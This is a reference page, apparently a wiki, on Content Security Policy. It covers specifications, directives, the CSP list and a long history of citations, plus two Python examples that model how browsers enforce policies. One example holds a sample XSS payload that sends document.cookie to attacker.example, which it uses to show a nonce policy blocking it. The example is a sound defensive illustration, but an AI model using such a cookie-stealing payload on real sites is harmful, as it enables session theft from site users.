[138] [DFN[CSP]] ([DFN[content security policy]])
describes the [[security]] constraints that the [[Web page]] in question must satisfy.
By using [[CSP]], the safety of a [[Web site]] can be improved, for instance by confining the
impact of a [[vulnerability]] in a [[Web application]] such as [[XSS]].

* Specifications

[REFS[
- [117] [CITE@en[Content Security Policy Level 3]] ([TIME[2016-02-29 23:20:13 +09:00]] version) <https://w3c.github.io/webappsec-csp/>
-- [48] formerly [CITE@en[Content Security Policy]] ([TIME[2015-05-05 20:49:34 +09:00]] version) <https://w3c.github.io/webappsec/specs/content-security-policy/>
- [118] [CITE@en[Content Security Policy: Document Features]] ([TIME[2016-02-29 23:20:13 +09:00]] version) <https://w3c.github.io/webappsec-csp/document/>
- [59] [CITE@en-GB-x-hixie[HTML Standard]] ([TIME[2015-09-18 02:18:44 +09:00]] version) <https://html.spec.whatwg.org/#attr-meta-http-equiv-content-security-policy>
- [82] [CITE@en-GB-x-hixie[HTML Standard]] ([TIME[2015-11-06 03:51:21 +09:00]] version) <https://html.spec.whatwg.org/#concept-document-csp-list>
- [87] [CITE@en-GB-x-hixie[HTML Standard]] ([TIME[2015-11-06 03:51:21 +09:00]] version) <https://html.spec.whatwg.org/#concept-workerglobalscope-csp-list>
- [112] [CITE@en[RFC 7762 - Initial Assignment for the Content Security Policy Directives Registry]] ([TIME[2016-01-29 12:26:08 +09:00]] version) <https://tools.ietf.org/html/rfc7762>
- [111] [CITE[Content Security Policy Directives]] ([TIME[2015-11-25 05:20:01 +09:00]] version) <https://www.iana.org/assignments/content-security-policy-directives/content-security-policy-directives.xhtml>
]REFS]

* Usage

[174] When the features a [[Web page]] uses (the range of resources it accesses) are limited to begin with,
and a malicious third party's attack tries to use features outside that range,
declaring the permitted range in advance with [[CSP]] stops the attack,
even when the [[Web page]] has a [[vulnerability]] that would otherwise leave it unpreventable.
[[CSP]] does not fix the vulnerability itself; it bounds what injected content can do,
for example which origins scripts may be loaded from and whether inline scripts may execute.

[175] In a [[UGC]] style [[Web application]], where arbitrary [[user]] input is to be published on a [[Web page]],
[[CSP]] can declare what is permitted so that a malicious [[user]] supplying attack input cannot harm other [[users]].
This is a second line of defence, not a replacement for escaping the input on output,
and the policy must be strict enough to matter: a [CODE(HTTP)@en[script-src]] that lists
[CODE(HTTP)@en['unsafe-inline']] blocks nothing an [[XSS]] payload needs.
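The UGC case above, as an added worked example that is not code from the original page: a page embeds a user comment verbatim (modelling an XSS bug the site has not fixed) and ships a nonce-based [CODE(HTTP)@en[script-src]]; the checker reproduces the decision a browser makes for each inline script. The policy string, nonce value, page template and comment text are all constructed for the example. The matching rules follow CSP Level 2/3: a nonce is compared exactly, a hash source matches the SHA-2 digest of the script body, and [CODE(HTTP)@en['unsafe-inline']] is ignored once any nonce or hash source is present.

```python
import base64
import hashlib
import re


def parse_policy(serialized):
    """Parse a serialized CSP into {directive-name: [source expressions]}.
    Directive names are case-insensitive; the first occurrence of a directive
    wins and later duplicates are ignored, as the spec requires."""
    directives = {}
    for token in serialized.split(";"):
        parts = token.split()
        if parts:
            directives.setdefault(parts[0].lower(), parts[1:])
    return directives


def hash_source(script_text, algo="sha256"):
    """Return the 'sha256-...' (or sha384/sha512) source expression matching script_text."""
    digest = hashlib.new(algo, script_text.encode("utf-8")).digest()
    return f"'{algo}-{base64.b64encode(digest).decode('ascii')}'"


def inline_script_allowed(directives, script_text, nonce_attr=None):
    """Decide whether an inline <script> may execute under the policy.
    script-src governs scripts and falls back to default-src; if neither is
    present the policy says nothing about scripts and the block runs."""
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return True
    lowered = [s.lower() for s in sources]
    has_nonce_or_hash = any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in lowered)
    # 'unsafe-inline' only takes effect when no nonce or hash source is listed
    if "'unsafe-inline'" in lowered and not has_nonce_or_hash:
        return True
    # nonce and hash comparisons are exact (case-sensitive): use the raw list
    if nonce_attr and f"'nonce-{nonce_attr}'" in sources:
        return True
    return any(hash_source(script_text, algo) in sources
               for algo in ("sha256", "sha384", "sha512"))


SCRIPT_RE = re.compile(r'<script(?:\s+nonce="([^"]*)")?>(.*?)</script>', re.S)


def render_comment_page(user_comment, nonce):
    """Constructed UGC page: the site's own script carries the nonce, while the
    user's comment is embedded unescaped (the XSS the CSP has to contain)."""
    return (f'<script nonce="{nonce}">initComments();</script>\n'
            f'<div class="comment">{user_comment}</div>')


def audit_page(policy, html):
    """Return [(script body, allowed?)] for every inline script on the page."""
    directives = parse_policy(policy)
    return [(body, inline_script_allowed(directives, body, nonce or None))
            for nonce, body in SCRIPT_RE.findall(html)]


if __name__ == "__main__":
    nonce = "d2VsbC1rbm93bg=="   # constructed; a real server draws a fresh one per response
    policy = f"default-src 'self'; script-src 'self' 'nonce-{nonce}'"
    attack = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
    for body, allowed in audit_page(policy, render_comment_page(attack, nonce)):
        print("ALLOW" if allowed else "BLOCK", body)
```

The injected script has no nonce attribute and its digest is not listed, so it is blocked while the site's own script runs; the same checker shows that adding [CODE(HTTP)@en['unsafe-inline']] next to the nonce changes nothing, because the keyword is discarded once a nonce is present.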

* Directives

[71] The following [[directives]] exist.
[FIG(middle list)[
- [CODE(HTTP)@en[[[block-all-mixed-content]]]]
- [CODE(HTTP)@en[[[report-uri]]]]
- [CODE(HTTP)@en[[[upgrade-insecure-requests]]]]
- [CODE(HTTP)@en[sandbox]]

[HISTORY[
- [CODE[cookie-scope]]
]HISTORY]
]FIG]

-*-*-

[113] There is (for some reason) an [[IANA registry]] [SRC[>>112, >>111]].

[176] However, only the directives of the old [[CSP2]] are registered.
Perhaps only what has reached [[W3C Recommendation]] status gets registered?
[[CSP3]] changes the design throughout,
and there are several [[specifications]] besides the [[CSP]] core,
so a registry that records none of them is of little use.

* CSP list

[83] A [[document]] [SRC[>>82]] and a [CODE(DOMi)@en[[[WorkerGlobalScope]]]] [SRC[>>87]]
have a [DFN[[F[[[CSP list]]]]]].

[84] This is the list of [[CSP]] policy objects that apply to it. Initially it is empty. [SRC[>>82]]

[86] In [[navigate]] its value is set by [[initialize a [CODE(DOMi)@en[Document]]'s CSP list]].

[88] In [[run a worker]], the [[CSP list]] of the [[response]] is inherited.

[85] For an [[overridden reload]] or a load from a [CODE(HTMLa)@en[[[srcdoc]]]]
[[attribute]], the [F[[[CSP list]]]] of the originating [[document]] is inherited.

* Related

[139] It is closely related to [[fetch]], [[navigate]], and [[sandboxing]].

* History

[1] [CITE@en[Security/CSP - MozillaWiki]]
([TIME[2009-10-09 22:03:58 +09:00]] version)
<https://wiki.mozilla.org/Security/CSP>

[2] [CITE@en[Security/CSP/Spec - MozillaWiki]]
([TIME[2009-11-04 04:19:11 +09:00]] version)
<https://wiki.mozilla.org/Security/CSP/Spec>

[3] [CITE@en[Security/CSP/Specification - MozillaWiki]]
([TIME[2010-05-22 03:46:34 +09:00]] version)
<https://wiki.mozilla.org/Security/CSP/Specification>

[4] [CITE@en[XSS mitigation in browsers]]
(by [[Adam Barth]], [TIME[2011-01-20 07:42:47 +09:00]] version)
<http://lists.w3.org/Archives/Public/public-web-security/2011Jan/0002.html>

[5] [CITE@en[Content Security Policy]]
([TIME[2011-12-01 01:03:34 +09:00]] version)
<http://www.w3.org/TR/2011/WD-CSP-20111129/>

[6] [CITE[IRC logs: freenode / #whatwg / 20111206]]
([TIME[2011-12-06 21:54:13 +09:00]] version)
<http://krijnhoetmer.nl/irc-logs/whatwg/20111206>

[7] [CITE['''['''whatwg''']''' CSP sandbox directive integration with HTML]]
([TIME[2011-12-07 09:36:37 +09:00]] version)
<http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2011-December/034071.html>

[8] [CITE@en[Content Security Policy]]
([TIME[2012-04-14 10:44:44 +09:00]] version)
<http://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html>

[9] [CITE@en[draft-gondrom-websec-csp-header-00 - HTTP Header Content Security Policy]]
([TIME[2012-03-06 21:39:17 +09:00]] version)
<http://tools.ietf.org/html/draft-gondrom-websec-csp-header-00>

[10] [CITE[Content Security Policy (CSP) - Google Chrome Extensions - Google Code]]
([TIME[2012-07-04 21:12:09 +09:00]] version)
<http://code.google.com/chrome/extensions/contentSecurityPolicy.html>

[11] [CITE@en[Content Security Policy 1.0]]
([TIME[2012-07-08 08:24:03 +09:00]] version)
<http://www.w3.org/TR/2012/WD-CSP-20120710/>

[12] [CITE@en[Content Security Policy 1.0]]
([TIME[2012-11-15 02:39:08 +09:00]] version)
<http://www.w3.org/TR/2012/CR-CSP-20121115/>

[13] [CITE@en[User Interface Safety Directives for Content Security Policy]]
([TIME[2012-11-20 22:47:37 +09:00]] version)
<http://www.w3.org/TR/2012/WD-UISafety-20121120/>

[14] [CITE[Content Security Policy 1.1]]
([TIME[2012-12-13 23:00:55 +09:00]] version)
<http://www.w3.org/TR/2012/WD-CSP11-20121213/>

[15] [CITE[Chromium Blog: Chrome 25 Beta: Content Security Policy and Shadow DOM]]
([TIME[2013-01-16 03:52:16 +09:00]] version)
<http://blog.chromium.org/2013/01/content-security-policy-and-shadow-dom.html>

[16] [CITE@en[Runtime and Security Model for Web Applications]]
([TIME[2013-03-21 23:02:32 +09:00]] version)
<http://www.w3.org/TR/2013/WD-runtime-20130321/#csp-policy>

[17] [CITE@en[User Interface Security Directives for Content Security Policy]]
([TIME[2013-05-22 21:37:57 +09:00]] version)
<http://www.w3.org/TR/2013/WD-UISecurity-20130523/>

[18] [CITE[Chromium Blog: Chrome 28 Beta: A more immersive web, everywhere]]
([TIME[2013-05-23 17:42:48 +09:00]] version)
<http://blog.chromium.org/2013/05/chrome-28-beta-more-immersive-web.html>

[19] [CITE@en[Content Security Policy 1.1]]
([TIME[2013-06-04 06:35:02 +09:00]] version)
<http://www.w3.org/TR/2013/WD-CSP11-20130604/>

[20] [CITE[Content Security Policy (CSP) - Google Chrome]]
([TIME[2013-10-13 01:58:37 +09:00]] version)
<http://developer.chrome.com/extensions/contentSecurityPolicy.html>

[21] [CITE@en-US[Default CSP restrictions - Security | MDN]]
([TIME[2013-10-01 06:35:59 +09:00]] version)
<https://developer.mozilla.org/en/docs/Security/CSP/Default_CSP_restrictions>

[22] [CITE@en-US[Introducing Content Security Policy - Security | MDN]]
([TIME[2013-09-30 19:27:42 +09:00]] version)
<https://developer.mozilla.org/en-US/docs/Security/CSP/Introducing_Content_Security_Policy>

[23] [CITE@en[''''''[''''''webappsec'''''']'''''' Proposal: Closing the feature set of CSP 1.1]]
(by [[Brad Hill]], [TIME[2013-09-10 09:14:02 +09:00]] version)
<http://lists.w3.org/Archives/Public/public-webappsec/2013Sep/0019.html>

[24] [CITE@en[Content Security Policy 1.1]]
([TIME[2014-01-16 14:18:10 +09:00]] version)
<http://w3c.github.io/webappsec/specs/content-security-policy/csp-specification.dev.html>

[25] [CITE[Bug 2494 – Add hooks for CSP]]
([TIME[2014-02-05 07:24:56 +09:00]] version)
<https://bugs.ecmascript.org/show_bug.cgi?id=2494>

[26] [CITE@en[Content Security Policy 1.1]]
([TIME[2014-02-11 06:15:48 +09:00]] version)
<http://www.w3.org/TR/2014/WD-CSP11-20140211/>

[27] [CITE@en[User Interface Security Directives for Content Security Policy]]
([TIME[2014-03-15 06:10:22 +09:00]] version)
<http://www.w3.org/TR/2014/WD-UISecurity-20140318/>

[28] [CITE@en[User Interface Security Directives for Content Security Policy]]
([TIME[2014-04-25 10:54:40 +09:00]] version)
<https://dvcs.w3.org/hg/user-interface-safety/raw-file/tip/user-interface-safety.html>

[29] [CITE[Clarify MIX and CSP hooks a bit · 682f68d · whatwg/fetch]]
([TIME[2014-06-16 03:02:02 +09:00]] version)
<https://github.com/whatwg/fetch/commit/682f68d5f0cce7f9637a8f6d9450b514ed276f9b>

[30] [CITE[Put MIX/CSP hooks in switch. Put second MIX check before tainting. · 567fe8a · whatwg/fetch]]
([TIME[2014-06-16 03:05:42 +09:00]] version)
<https://github.com/whatwg/fetch/commit/567fe8ad5f1804efdefa7aa273f2a366b223c70e>

[31] [CITE@en[Content Security Policy Level 2]]
([TIME[2014-07-03 04:53:53 +09:00]] version)
<http://www.w3.org/TR/2014/WD-CSP2-20140703/>

[32] [CITE@en["Why is CSP failing? Trends and Challenges in CSP Adoption"]]
(by [[Oda, Terri]], [TIME[2014-07-24 03:26:19 +09:00]] version)
<http://lists.w3.org/Archives/Public/public-webappsec/2014Jul/0100.html>

[33] ([TIME[2014-07-15 00:50:45 +09:00]] version)
<http://mweissbacher.com/publications/csp_raid.pdf>

[34] [CITE@en[''''''[''''''webappsec'''''']'''''' Call for Consensus: CSP Level 2 to Candidate Recommendation]]
(by [[Brad Hill]], [TIME[2014-10-21 08:02:34 +09:00]] version)
<http://lists.w3.org/Archives/Public/public-webappsec/2014Oct/0063.html>

[35] [CITE@en[''''''[''''''webappsec'''''']'''''' Call for Consensus: Stop work on Content Security Policy 1.0, transition to WG Note]]
(by [[Brad Hill]], [TIME[2014-10-21 08:13:56 +09:00]] version)
<http://lists.w3.org/Archives/Public/public-webappsec/2014Oct/0064.html>

[36] [CITE@en[CSP3: Starting on DOM API strawman. · 92b8dd4 · w3c/webappsec]]
([TIME[2014-11-04 03:23:06 +09:00]] version)
<https://github.com/w3c/webappsec/commit/92b8dd4778ad1a237e5b5be015f9482bd3ad2ff4>

[37] [CITE@en[CSP3: DOM API Strawman]]
(by [[Mike West]], [TIME[2014-11-03 22:24:45 +09:00]] version)
<http://lists.w3.org/Archives/Public/public-webappsec/2014Nov/0005.html>

[38] [CITE@en[''''''[''''''webappsec'''''']'''''' Rechartering: CSP Level 3]]
(by [[Brad Hill]], [TIME[2014-11-10 09:02:46 +09:00]] version)
<http://lists.w3.org/Archives/Public/public-webappsec/2014Nov/0126.html>

[39] [CITE@en[Official Gmail Blog: Reject the unexpected - Content Security Policy in Gmail]]
([TIME[2014-12-19 08:00:09 +09:00]] version)
<http://gmailblog.blogspot.jp/2014/12/reject-unexpected-content-security.html>

[40] [CITE@en[Fix the order of CSP, HSTS, Mixed Content, and Referrer https://www.w3.o... · b8c2c49 · whatwg/fetch]]
([TIME[2015-01-28 18:20:53 +09:00]] version)
<https://github.com/whatwg/fetch/commit/b8c2c4964c233cd3616042c04e2c14e0ff25485d>

[41] [CITE@en[Re: CfC: Transition CSP2 to CR.]]
(by [[Mike West]], [TIME[2015-02-08 02:05:21 +09:00]] version)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Feb/0124.html>

[42] [CITE@en[Content Security Policy 1.0]]
([TIME[2015-02-19 06:00:25 +09:00]] version)
<http://www.w3.org/TR/2015/NOTE-CSP1-20150219/>

[43] [CITE@en[Content Security Policy Level 2]]
([TIME[2015-02-17 00:13:08 +09:00]] version)
<http://www.w3.org/TR/2015/CR-CSP2-20150219/>

[44] [CITE@en[Content Security Policy Pinning]]
([TIME[2015-02-24 21:59:42 +09:00]] version)
<http://www.w3.org/TR/2015/WD-csp-pinning-20150226/>

[45] [CITE@en[Content Security Policy Pinning]]
([TIME[2015-02-26 20:26:19 +09:00]] version)
<https://w3c.github.io/webappsec/specs/csp-pinning/>

[46] [CITE[Content Security Policy]]
([TIME[2011-12-29 07:11:55 +09:00]] version)
<http://people.mozilla.org/~bsterne/content-security-policy/index.html>

[47] [CITE@en[Security/CSP/Spec - MozillaWiki]]
([TIME[2015-03-31 11:52:15 +09:00]] version)
<https://wiki.mozilla.org/Security/CSP/Spec>

[49] [CITE@en[Store a url list for requests and responses so CSP can do the right t… · whatwg/fetch@1d8173a]]
([TIME[2015-06-12 12:18:00 +09:00]] version)
<https://github.com/whatwg/fetch/commit/1d8173afffcffad2587f2922381878939c9cebea>

[50] [CITE@en[Add the response CSP check as open issue. Fixes #77. · whatwg/fetch@baeb561]]
([TIME[2015-07-15 12:37:36 +09:00]] version)
<https://github.com/whatwg/fetch/commit/baeb561384ee353b13a2ca0b2a31fd79b769caa2>

[51] [CITE@en[CSP: Blob URLs in new windows.]]
(by [[Mike West]], [TIME[2015-07-20 13:40:23 +09:00]] version)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Jul/0126.html>

[FIG(quote)[
[FIGCAPTION[
[52] [CITE@en[Re: CfC: Mixed Content to PR; deadline July 6th.]]
(by [[Mike West]], [TIME[2015-07-21 03:38:29 +09:00]] version)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Jul/0144.html>
]FIGCAPTION]

> Hammering out scope for CSP3 is on my list for this quarter. Rewriting
> enforcement and monitoring in terms of Fetch is totally going to happen.
> Sorry it's taken so long.

]FIG]

[53] [CITE@en[Content Security Policy Level 2]]
([TIME[2015-07-21 00:31:23 +09:00]] version)
<http://www.w3.org/TR/2015/CR-CSP2-20150721/>

[54] [CITE@en[Runtime and Security Model for Web Applications]]
([TIME[2015-08-04 19:31:42 +09:00]] version)
<http://www.w3.org/TR/2015/NOTE-runtime-20150806/#csp-policy>

[55] [CITE@en[RE: CfC: CSP2 to PR; deadline Aug 18th.]]
(by [[Crispin Cowan]], [TIME[2015-08-14 08:47:59 +09:00]] version)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Aug/0069.html>

[56] [CITE@en[JSON CSP]]
([TIME[2015-08-15 11:55:12 +09:00]] version)
<https://gist.github.com/jonathanKingston/5699b440f608960dc089>

[57] [CITE@en[JSON representation of CSP policies]]
(by [[Jonathan Kingston]], [TIME[2015-08-15 07:20:24 +09:00]] version)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Aug/0073.html>

[58] [CITE@en[Re: JSON representation of CSP policies]]
(by [[Mike West]], [TIME[2015-08-17 22:48:08 +09:00]] version)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Aug/0079.html>

[60] [CITE@en[Fix #88: add the 'Content-Security-Policy' pragma directive · whatwg/html@5064a62]]
([TIME[2015-09-19 13:39:47 +09:00]] version)
<https://github.com/whatwg/html/commit/5064a629f22bef29839ab4dc6f1ceef17f010bc5>

[61] [CITE@en[CSP-COOKIES: If nothing else, this will be a good argument aabout doc… · w3c/webappsec@8e1be6f]]
([TIME[2015-09-26 11:40:04 +09:00]] version)
<https://github.com/w3c/webappsec/commit/8e1be6ff6407b71443b2efe5b21d9455aa607ef8>

[62] [CITE@en[CSP-COOKIES: Cleaning up for wider review. · w3c/webappsec@ee2d941]]
([TIME[2015-09-27 14:23:46 +09:00]] version)
<https://github.com/w3c/webappsec/commit/ee2d9412e651eba82f5c2fc3d628b6d0e55c21be>

[63] [CITE@en[CSP3 as a polylithic set of modules?]]
(by [[Mike West]], [TIME[2015-09-27 01:29:34 +09:00]] version)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Sep/0210.html>

[64] [CITE@en[Content Security Policy Pinning]]
([TIME[2015-10-06 19:45:04 +09:00]] version)
<https://w3c.github.io/webappsec-csp/pinning/>

[65] [CITE@en[w3c/webappsec-csp]]
([TIME[2015-10-06 23:20:06 +09:00]] version)
<https://github.com/w3c/webappsec-csp>

[66] [CITE[CSP: Defining the CH-CSP Client Hint. · 049a3c9 · w3c/webappsec]]
([TIME[2014-06-13 15:16:48 +09:00]] version)
<https://github.com/w3c/webappsec/commit/049a3c94817770487e21d6151b135bca4b19ba46>

[67] [CITE@en[CSP: Drop the 'CH-' prefix on the request header. · 548a228 · w3c/webappsec]]
([TIME[2014-09-02 08:17:30 +09:00]] version)
<https://github.com/w3c/webappsec/commit/548a228a5349b0eef8a14e048500e8eb3dbf3674>

[68] [CITE@en[CSP2: Note the issue the 'CSP' header was meant to solve. · w3c/webappsec@5233fe8]]
([TIME[2015-08-13 11:53:34 +09:00]] version)
<https://github.com/w3c/webappsec/commit/5233fe8e75fd5b155135c6eca35fb48e685c14e5>

[69] [CITE@en[draft-west-webappsec-csp-reg-00 - Content Security Policy Directive Registry]]
([TIME[2015-10-07 03:48:16 +09:00]] version)
<https://tools.ietf.org/html/draft-west-webappsec-csp-reg-00>

[70] [CITE@en[Hey, look at that. A strawman IANA registry. · w3c/webappsec-csp@224f8e6]]
([TIME[2015-10-07 13:49:13 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/224f8e6ac414119260af0fc8a0f8326b94bac655>

[72] [CITE@en[763879 – (CSP) implement blocking of inline stylesheets]]
([TIME[2015-10-09 21:54:26 +09:00]] version)
<https://bugzilla.mozilla.org/show_bug.cgi?id=763879>

[73] [CITE@en[Clear response's CSP list before setting. · w3c/webappsec-csp@0545ae0]]
([TIME[2015-10-15 11:55:17 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/0545ae08d6c74788f006e07b2b991bbf925c9691>

[74] [CITE@en[Extensions should bypass CSP. · w3c/webappsec-csp@1b7b2c4]]
([TIME[2015-10-15 11:56:03 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/1b7b2c401ed1dc2b435cb3e68313ced19c88d597>

[75] [CITE@en[Update Fetch with shiny, new CSP hooks · whatwg/fetch@8ce550b]]
([TIME[2015-10-16 14:30:15 +09:00]] version)
<https://github.com/whatwg/fetch/commit/8ce550b53c53e2b6e8376373b94d66b2eeada8f8>

[76] [CITE@en[Drop Fetch issues after https://github.com/whatwg/fetch/commit/8ce550… · w3c/webappsec-csp@c2b6452]]
([TIME[2015-10-16 14:31:34 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/c2b64522fb6f4cb4f683344ee3cd890dfdcc515d>

[77] [CITE@en[Update CSP links · whatwg/html@7e8a536]]
([TIME[2015-10-22 11:44:39 +09:00]] version)
<https://github.com/whatwg/html/commit/7e8a5367d1e0d9c1b7e84d2c86e7821af0ff167a>

[FIG(quote)[
[FIGCAPTION[
[78] [CITE@en[Upgrade Insecure Requests]]
([TIME[2015-10-07 03:24:10 +09:00]] version)
<https://w3c.github.io/webappsec-upgrade-insecure-requests/#reporting-upgrades>
]FIGCAPTION]

> Upgrading insecure requests MUST not interfere with an authors' ability to track down requests that would be insecure in a user agent that does not support upgrades. To that end, upgrades MUST be performed after evaluating request against all monitored security policies, but before evaluating request against all enforced policies.

]FIG]
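As an added example (not code from this page or from any of the specifications cited on it), the following models the CSP list described in the CSP list section above: a document carries several policies, each with an enforce or report-only disposition, and a request is checked against every one of them. It also applies the ordering the Upgrade Insecure Requests text just quoted requires: report-only policies see the original, insecure URL, then the upgrade is applied, and only then are the enforced policies consulted, so a violation report can still name the URL the page actually requested. The origin, policies and request URLs are constructed for the example. Source matching covers [CODE(HTTP)@en['self']], [CODE(HTTP)@en['none']], [CODE(HTTP)@en[*]], scheme sources and host sources (wildcard host, port, path prefix) and leaves out redirects and nested browsing context inheritance; applying the upgrade only when an enforced policy carries [CODE(HTTP)@en[upgrade-insecure-requests]] is an assumption of the example.

```python
from urllib.parse import urlsplit, urlunsplit

DEFAULT_PORTS = {"http": 80, "https": 443, "ws": 80, "wss": 443}
NETWORK_SCHEMES = ("http", "https", "ws", "wss")


def parse_policy(serialized, disposition):
    """Parse one Content-Security-Policy(-Report-Only) value into a policy object.
    disposition is 'enforce' or 'report-only'; the first occurrence of a directive wins."""
    directives = {}
    for token in serialized.split(";"):
        parts = token.split()
        if parts:
            directives.setdefault(parts[0].lower(), parts[1:])
    return {"directives": directives, "disposition": disposition}


def scheme_matches(expr_scheme, url_scheme):
    # CSP3: an http source also matches https, and ws also matches wss
    return expr_scheme == url_scheme or (expr_scheme, url_scheme) in {("http", "https"), ("ws", "wss")}


def source_matches(expr, url, self_origin):
    """Does one source expression match url? self_origin is the protected resource's origin."""
    u = urlsplit(url)
    u_port = u.port or DEFAULT_PORTS.get(u.scheme)
    u_host = (u.hostname or "").lower()
    e = expr.lower()
    if e == "'self'":
        s = urlsplit(self_origin)
        return (u.scheme, u_host, u_port) == (s.scheme, (s.hostname or "").lower(),
                                               s.port or DEFAULT_PORTS.get(s.scheme))
    if e.startswith("'"):                    # 'none', nonces, hashes and other keywords never match a URL
        return False
    if e == "*":                             # a bare * excludes data:, blob:, filesystem:
        return u.scheme in NETWORK_SCHEMES
    if e.endswith(":") and "/" not in e:     # scheme-source such as https: or data:
        return scheme_matches(e[:-1], u.scheme)
    # host-source: [scheme://]host[:port][/path]
    scheme, rest = e.split("://", 1) if "://" in e else (None, e)
    hostport, _, path = rest.partition("/")
    host, _, port = hostport.partition(":")
    if not scheme_matches(scheme or urlsplit(self_origin).scheme, u.scheme):
        return False                         # no explicit scheme: the URL must match the page's scheme
    if host == "*":
        pass                                 # https://* matches any host over that scheme
    elif host.startswith("*."):
        if not u_host.endswith(host[1:]):    # *.cdn.example matches static.cdn.example, not cdn.example
            return False
    elif u_host != host:
        return False
    if port == "":
        if u_port != DEFAULT_PORTS.get(u.scheme):
            return False
    elif port != "*" and u_port != int(port):
        return False
    if path:
        expr_path, u_path = "/" + path, u.path or "/"
        if expr_path.endswith("/"):
            return u_path.startswith(expr_path)   # directory prefix
        return u_path == expr_path                # exact file
    return True


def policy_allows(policy, directive, url, self_origin):
    d = policy["directives"]
    sources = d.get(directive, d.get("default-src"))   # fetch directives fall back to default-src
    if sources is None:
        return True
    return any(source_matches(s, url, self_origin) for s in sources)


def upgrade_insecure(url):
    """Rewrite an a priori insecure URL (http/ws) to https/wss; an explicit :80 becomes :443."""
    u = urlsplit(url)
    if u.scheme not in ("http", "ws"):
        return url
    netloc = u.netloc.rsplit(":", 1)[0] + ":443" if u.port == 80 else u.netloc
    return urlunsplit(("https" if u.scheme == "http" else "wss", netloc, u.path, u.query, u.fragment))


def evaluate_request(csp_list, directive, url, self_origin):
    """Run one request through the document's CSP list in spec order;
    return (final url, blocked?, violation reports)."""
    reports = []
    for p in csp_list:                       # 1. monitored policies see the original URL
        if p["disposition"] == "report-only" and not policy_allows(p, directive, url, self_origin):
            reports.append(("report-only", directive, url))
    if any(p["disposition"] == "enforce" and "upgrade-insecure-requests" in p["directives"]
           for p in csp_list):
        url = upgrade_insecure(url)          # 2. upgrade (assumed to need an enforced policy)
    blocked = False
    for p in csp_list:                       # 3. enforced policies see the upgraded URL
        if p["disposition"] == "enforce" and not policy_allows(p, directive, url, self_origin):
            blocked = True
            reports.append(("enforce", directive, url))
    return url, blocked, reports


if __name__ == "__main__":
    SELF = "https://app.example"             # constructed origin and headers
    csp_list = [
        parse_policy("default-src 'self'; img-src 'self' *.cdn.example; upgrade-insecure-requests", "enforce"),
        parse_policy("img-src 'self'", "report-only"),
    ]
    for directive, url in [("img-src", "http://static.cdn.example/logo.png"),
                           ("script-src", "https://evil.example/x.js")]:
        print(directive, url, "->", evaluate_request(csp_list, directive, url, SELF))
```

For the image request the report-only policy reports the [CODE[http://]] URL it was asked about, the enforced policy upgrades it and then admits it via [CODE[*.cdn.example]], so nothing is blocked; the script request has no [CODE(HTTP)@en[script-src]], falls back to [CODE(HTTP)@en[default-src 'self']] and is blocked with a report against the enforced policy.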


[FIG(quote)[
[FIGCAPTION[
[79] [CITE@en[Upgrade Insecure Requests]]
([TIME[2015-10-07 03:24:10 +09:00]] version)
<https://w3c.github.io/webappsec-upgrade-insecure-requests/#violation-report-target>
]FIGCAPTION]

> When sending a violation report for an upgraded resource, user agents MUST target the Document or Worker that triggered the request, rather than the Document or Worker on which the upgrade-insecure-requests directive was set. Due to §3.3 Policy Inheritance, the latter might be a cross-origin ancestor of the former, and sending violation reports to that set of reporting endpoints could leak data in unexpected ways.
> Likewise, the SecurityPolicyViolationEvent MUST NOT target any Document other than the one which triggered the request, for the same reasons.

]FIG]

[80] [CITE@en[Allow upgrades from explicitly insecure expressions · w3c/webappsec-csp@0e81d81]]
([TIME[2015-10-29 12:41:01 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/0e81d81b64c42ca3c81c048161162b9697ff7b60>

[81] [CITE@en[Use the URL from the response, if it has one · whatwg/fetch@ed37f5e]]
([TIME[2015-11-05 17:18:28 +09:00]] version)
<https://github.com/whatwg/fetch/commit/ed37f5e4cf0ec6615f93b8a575d7349b977ffc3a>

[89] [CITE@en[Split reporting and enforcement for Fetch. · w3c/webappsec-csp@6647d2d]]
([TIME[2015-11-08 15:43:35 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/6647d2de191283e94cec1059411f536e6d6b95b5>

[90] [CITE@en[Separate 'report-only' and 'enforce' CSP execution · whatwg/fetch@a58871a]]
([TIME[2015-11-08 15:50:14 +09:00]] version)
<https://github.com/whatwg/fetch/commit/a58871a92cbf9304ea4e661f31efb9f2b78bf44b>

[91] [CITE@en[Call out to CSP's inline element hooks · whatwg/html@ee3486e]]
([TIME[2015-11-08 16:32:16 +09:00]] version)
<https://github.com/whatwg/html/commit/ee3486eb129bc350b5ca684d0c91dff23453ac1a>

[92] [CITE@en[Move to CSP2. · w3c/webappsec-csp@2a08d9b]]
([TIME[2015-11-21 16:09:45 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/2a08d9b2ee2a5cea8f0bd2bae1f7faedd9a700e7>

[93] [CITE@en[Updating EMBEDDED for a potential FPWD. · w3c/webappsec-csp@7260140]]
([TIME[2015-12-01 11:36:34 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/726014018c622455f72cd434a8622e784322318d>

[94] [CITE@en[CfC: CSP Embedded Enforcement to FPWD; deadline Dec. 7th.]]
(by [[Mike West]], [TIME[2015-11-30 19:14:35 +09:00]] version)
<https://lists.w3.org/Archives/Public/public-webappsec/2015Nov/0070.html>

[95] [CITE@en[Working on the split. · w3c/webappsec-csp@72c7f3e]]
([TIME[2015-12-03 14:41:14 +09:00]] version)
<https://github.com/w3c/webappsec-csp/commit/72c7f3ecc3eae190bd5df656cb5e8dbc4abb5a9a>

[96] [CITE@en[new CSP draft.]]
(by [[Mike West]], [TIME[2015-12-04 22:31:03 +09:00]] version)
